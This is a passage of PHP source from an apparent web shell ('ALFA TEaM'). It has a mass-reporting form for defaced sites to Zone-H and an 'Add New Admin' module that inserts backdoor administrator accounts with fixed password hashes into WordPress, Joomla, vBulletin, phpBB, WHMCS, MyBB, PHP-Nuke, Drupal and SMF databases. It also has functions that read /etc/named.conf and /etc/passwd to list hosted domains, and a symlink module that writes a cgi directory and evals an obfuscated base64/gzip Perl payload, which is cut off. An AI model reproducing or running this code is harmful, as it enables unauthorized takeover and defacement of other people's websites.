<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
<br>
<select id="text" name="hackmode" style="width:400px;">';
$x=1;
foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
echo '</select><br><select id="text" name="reason" style="width:200px;">';
$x=1;
foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
echo '</select><br>
<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
<p><input type="submit" value=" " name="go" /></p>
</form></center>';
if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
ob_start();
$hacker = $_POST['alfa1'];
$method = $_POST['alfa2'];
$neden = $_POST['alfa3'];
$site = $_POST['alfa4'];
if(empty($hacker)){
die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
}elseif($method == "------------------------------------SELECT-------------------------------------"){
die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
}elseif($neden == "------------------------------------SELECT-------------------------------------"){
die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
}elseif(empty($site)){
die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
}
$i = 0;
$sites = explode("\n", $site);
$alfa = new AlfaCURL();
while($i < count($sites)){
if(substr($sites[$i], 0, 4) != "http"){
$sites[$i] = "http://".$sites[$i];
}
$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
++$i;
}
echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
}
echo "</div>";
alfafooter();
}
function alfapwchanger(){
alfahead();

echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
<center><h3>';
$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
Alfa_Create_A_Tag('pwchanger',$vals);
echo '</h3></center>';
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){

echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form>';
if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
$sole = @mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = @mysqli_fetch_assoc($solevisible);
$res = $solevis['ID'];
}
$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){

echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
$sole =@mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis =@mysqli_fetch_assoc($solevisible);
$res = $solevis['id'];
}
$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){

echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['userid'];
}
$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){

echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5('solevisible');
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');
}
}
}
if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){

echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){

echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){

echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 'td8' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
);
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa7'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5($pwd);
$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){

echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
 );
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
$getDescuid = @mysqli_fetch_assoc($getDescuid);
$getDescuid = $getDescuid['uid'];
$getdescuid = $getDescuid++;
$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['uid'];
}
$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}

if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){

echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
 'td7' =>
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
 );
create_table($table);
echo '<p><input value=" " name="send" type="submit"></p></form></center>';
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$setpwAlg = sha1(strtolower($admin) . 'solevisible');
$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
if($solevisible){
__alert('Success... '.$admin.' is created...');}
}
}
echo "</div>";
alfafooter();
}
function alfaMakePwd(){
	if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
		return "/home/{user}/public_html/";
	}
	$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
	$public = end($document);
	array_pop($document);
	array_pop($document);
	$path = implode("/", $document) . "/{user}/" . $public;
	return $path;
}
function alfaGetDomains($state = false){
	$state = "named.conf";
	$lines = array();
	$lines = _alfa_file('/etc/named.conf');
	if(!$lines){
		$lines = @scandir("/etc/valiases/");
		$state = "valiases";
		if(!$lines){
			$lines = @scandir("/var/named");
			$state = "named";
			if(!$lines && $state){
				$lines = _alfa_file('/etc/passwd');
				$state = "passwd";
			}
		}
	}
	return array("lines" => $lines, "state" => $state);
}
function alfasymlink(){
alfahead();
AlfaNum(9,10);
echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
	$sympath = alfaMakePwd();
	@mkdir('cgialfa',0755);
	@chdir('cgialfa');
	alfacgihtaccess('cgi');
	$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/50YC1PaSPivbFOuSVrJg2q1BFDOas+Ztt5U25sb8ZhNdoHUkOSyC0KR/vb79pEYFW3nMmPYzX7v9zpjFEVZyjhOOTo5Gx6+P0HdHqKLmHGGGkefvq7M9/3zo7/6fw9PPp0ffT7uHx6Z62C6RI15y0ddZBhqE6p1PEKWomOjVV7EQNY4zFJOU97ky5y2EacL7k74NBmkg7QjFr3OhGLS6/CYJ7R3mBFKULhE/Q/HfXRO+x87rjrpML6EH7wSJJqERlmBeZyl7TRLabDuuOq84ypyYUaWKBxHWZIVXfO5Jx+zZwRKLLND4jmSKF0jx4TE6bjte/kiCKa4GMdpM8w4z6bqW5gVhBZtP18ggtkEJHw+kk8g6bdhJ8gHUjScxOO0HYHOtAhGoH3zmsbjCW+HWULUBxZ/p+3WG6Bs3GrMsoQihgl6geJ0HrM4hP0PdLacJnF6hX5foj9pkXRcELxnBmuaMLrSbmj0P7//euFdBtoT0TjGyQi7RrBmsxDIDXFR4CVagbMswPG2GnPfswH0YCgc+NvcH8FminO0agxFDPhrdCAAg4LyWZEiSwUFIPujlUBe2/a+3/YUg/yalLTfaKrxyHqmQ2GlaQhhgzUcABSi/yKDxAWNuFEBGO4km1J3NWO0WLv5LEziaChiRCgCeE0KIJRHboqnlDgQuiMDvXiBmkR/n4PtMaPM/UWaByxPYg4Cy1/LHbjulop7493p4ZePR5/Oh59PT8+Nta3ifBdg8yxHCjGoLTW7b1mcWoZrbOnvtgMSaOYGcoCCstgUX1FelEbbBq5zKl7+nnjvaCPqFOoApApV82GEmZA6EO8irlAZ7cfweD5EOzDcdoyOK04hNQQgJxtoJXTEBSWMJgUddU3DAamodNLFvnguDbSPzG94jllUxDlv44QW3DKuoYKI6jGKU4